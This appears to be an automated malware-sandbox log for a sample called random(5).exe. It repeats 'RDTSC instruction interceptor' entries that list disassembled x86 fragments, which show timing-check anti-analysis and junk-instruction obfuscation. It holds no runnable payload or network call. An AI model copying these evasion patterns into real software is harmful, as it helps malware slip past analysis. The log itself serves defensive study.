Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91512 second address: 6E91518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91518 second address: 6E915AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, A9E1h 0x00000007 mov ax, 031Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [esi+32h] 0x00000012 jmp 00007F519CD4C388h 0x00000017 mov word ptr [edx+32h], ax 0x0000001b pushad 0x0000001c mov eax, 295053FDh 0x00000021 mov si, 32F9h 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+34h] 0x00000029 jmp 00007F519CD4C384h 0x0000002e mov dword ptr [edx+34h], eax 0x00000031 pushad 0x00000032 mov dx, cx 0x00000035 pushad 0x00000036 mov bx, si 0x00000039 movzx ecx, bx 0x0000003c popad 0x0000003d popad 0x0000003e test ecx, 00000700h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F519CD4C388h 0x0000004d xor al, FFFFFF98h 0x00000050 jmp 00007F519CD4C37Bh 0x00000055 popfd 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E915AB second address: 6E915B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E915B0 second address: 6E915E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520C0FA4CAh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F519CD4C385h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E915E0 second address: 6E915E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E915E6 second address: 6E91631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d call 00007F519CD4C381h 0x00000012 pop ebx 0x00000013 popad 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F519CD4C37Ah 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F519CD4C387h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91631 second address: 6E91637 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91637 second address: 6E9163B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9163B second address: 6E91650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F519CFC89BAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91650 second address: 6E91656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91656 second address: 6E9165A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E9165A second address: 6E91683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E91683 second address: 6E916A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0D26 second address: 6EE0D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0D2A second address: 6EE0D45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0D45 second address: 6EE0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, D563h 0x0000000f pushad 0x00000010 mov al, 4Eh 0x00000012 pushfd 0x00000013 jmp 00007F519CD4C37Bh 0x00000018 jmp 00007F519CD4C383h 0x0000001d popfd 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F519CD4C389h 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 jmp 00007F519CD4C37Ch 0x0000002d push esi 0x0000002e mov bh, 6Ch 0x00000030 pop esi 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F519CD4C382h 0x0000003d and ch, FFFFFF98h 0x00000040 jmp 00007F519CD4C37Bh 0x00000045 popfd 0x00000046 mov cx, 514Fh 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0DE6 second address: 6EE0E1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F519CFC89C6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E80019 second address: 6E80036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E80036 second address: 6E8003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E8003C second address: 6E80040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E80040 second address: 6E800D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007F519CFC89C4h 0x0000000f pushfd 0x00000010 jmp 00007F519CFC89C2h 0x00000015 add ax, F618h 0x0000001a jmp 00007F519CFC89BBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 call 00007F519CFC89C9h 0x00000026 pushfd 0x00000027 jmp 00007F519CFC89C0h 0x0000002c sbb ah, FFFFFFA8h 0x0000002f jmp 00007F519CFC89BBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F519CFC89C2h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20035 second address: 6E2004A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E209F2 second address: 6E20A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 jmp 00007F519CFC89C3h 0x0000000e popfd 0x0000000f mov edi, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F519CFC89C2h 0x0000001a push eax 0x0000001b jmp 00007F519CFC89BBh 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F519CFC89C6h 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20A64 second address: 6E20A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20A68 second address: 6E20A85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20A85 second address: 6E20AAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CD4C37Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20AAA second address: 6E20AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E20AB0 second address: 6E20AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E708FF second address: 6E7090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E7090E second address: 6E70912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E70912 second address: 6E70952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b mov ah, dl 0x0000000d pop eax 0x0000000e mov bx, B27Ch 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007F519CFC89BBh 0x0000001b mov ebp, esp 0x0000001d jmp 00007F519CFC89C6h 0x00000022 pop ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov bx, cx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50011 second address: 6E5002D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F519CD4C387h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5002D second address: 6E50041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50041 second address: 6E50045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50045 second address: 6E50049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50049 second address: 6E5004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50225 second address: 6E5022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5022B second address: 6E50278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F519CD4C385h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, bh 0x00000016 pushfd 0x00000017 jmp 00007F519CD4C384h 0x0000001c sub cx, D1A8h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50278 second address: 6E50301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dl, ah 0x00000010 call 00007F519CFC89BFh 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushfd 0x00000018 jmp 00007F519CFC89C9h 0x0000001d and ah, FFFFFFD6h 0x00000020 jmp 00007F519CFC89C1h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esp+24h], 00000000h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F519CFC89C8h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50301 second address: 6E50305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50305 second address: 6E5030B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5030B second address: 6E50344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock bts dword ptr [edi], 00000000h 0x0000000e jmp 00007F519CD4C380h 0x00000013 jc 00007F520D24E477h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, bx 0x0000001f mov edx, 16C6BBCCh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50344 second address: 6E5034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5034A second address: 6E5034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5034E second address: 6E5035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E5035D second address: 6E50361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50361 second address: 6E50367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E50367 second address: 6E503CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C37Ah 0x00000009 adc cx, 0318h 0x0000000e jmp 00007F519CD4C37Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F519CD4C388h 0x0000001a xor ch, 00000078h 0x0000001d jmp 00007F519CD4C37Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop esi 0x00000027 jmp 00007F519CD4C386h 0x0000002c pop ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E503CF second address: 6E503D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E503D3 second address: 6E503D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E503D7 second address: 6E503DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E8013D second address: 6E80143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E80143 second address: 6E80147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E70844 second address: 6E70853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E70853 second address: 6E70859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E70859 second address: 6E7085D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E7085D second address: 6E708AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F519CFC89BEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, C6A0h 0x00000016 pushfd 0x00000017 jmp 00007F519CFC89C9h 0x0000001c and ah, FFFFFFA6h 0x0000001f jmp 00007F519CFC89C1h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803BD second address: 6E803C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803C3 second address: 6E803C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803C7 second address: 6E803CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803CB second address: 6E803F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 1F9Ch 0x00000010 jmp 00007F519CFC89C5h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803F1 second address: 6E803F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803F7 second address: 6E803FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E803FB second address: 6E80417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov bl, 7Bh 0x0000000e mov ecx, 3B2F5D3Dh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6E80417 second address: 6E8041D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0A57 second address: 6EF0AB3 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 366Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F519CD4C382h 0x0000000f or cl, FFFFFF98h 0x00000012 jmp 00007F519CD4C37Bh 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007F519CD4C388h 0x0000001e add ch, FFFFFFF8h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0AB3 second address: 6EF0AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0AB9 second address: 6EF0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, dx 0x0000000e call 00007F519CD4C37Dh 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F519CD4C383h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushad 0x00000021 mov dx, cx 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 jmp 00007F519CD4C37Ah 0x0000002c popad 0x0000002d mov dl, byte ptr [ebp+14h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0B0F second address: 6EF0B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0B2C second address: 6EF0B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F519CD4C387h 0x00000008 pop ecx 0x00000009 mov dx, 59ECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [ebp+10h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F519CD4C387h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0B6C second address: 6EF0B92 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 471C3E4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d popad 0x0000000e and dl, 00000007h 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 mov ebx, esi 0x00000017 popad 0x00000018 test eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, bx 0x00000020 mov edx, 4DAA6D98h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0B92 second address: 6EF0BB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F520D1D19C4h 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 push eax 0x00000014 push edx 0x00000015 mov ch, dl 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0BB2 second address: 6EF0BD9 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F519CFC89C9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0BD9 second address: 6EF0BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop esi 0x0000000f mov ecx, edi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EF0BF7 second address: 6EF0A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, 2307FA93h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d shr eax, 1 0x0000000f jmp 00007F519CFC89C6h 0x00000014 jmp 00007F520D44DF6Bh 0x00000019 jne 00007F519CFC89ADh 0x0000001b inc ecx 0x0000001c shr eax, 1 0x0000001e jne 00007F519CFC89ADh 0x00000020 imul ecx, ecx, 03h 0x00000023 movzx eax, dl 0x00000026 cdq 0x00000027 sub ecx, 03h 0x0000002a call 00007F519CFD8EADh 0x0000002f cmp cl, 00000040h 0x00000032 jnc 00007F519CFC89C7h 0x00000034 cmp cl, 00000020h 0x00000037 jnc 00007F519CFC89B8h 0x00000039 shld edx, eax, cl 0x0000003c shl eax, cl 0x0000003e ret 0x0000003f or edx, dword ptr [ebp+0Ch] 0x00000042 or eax, dword ptr [ebp+08h] 0x00000045 or edx, 80000000h 0x0000004b pop ebp 0x0000004c retn 0010h 0x0000004f push ebp 0x00000050 push 00000001h 0x00000052 push edx 0x00000053 push eax 0x00000054 call edi 0x00000056 mov edi, edi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0CF2 second address: 6ED0CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
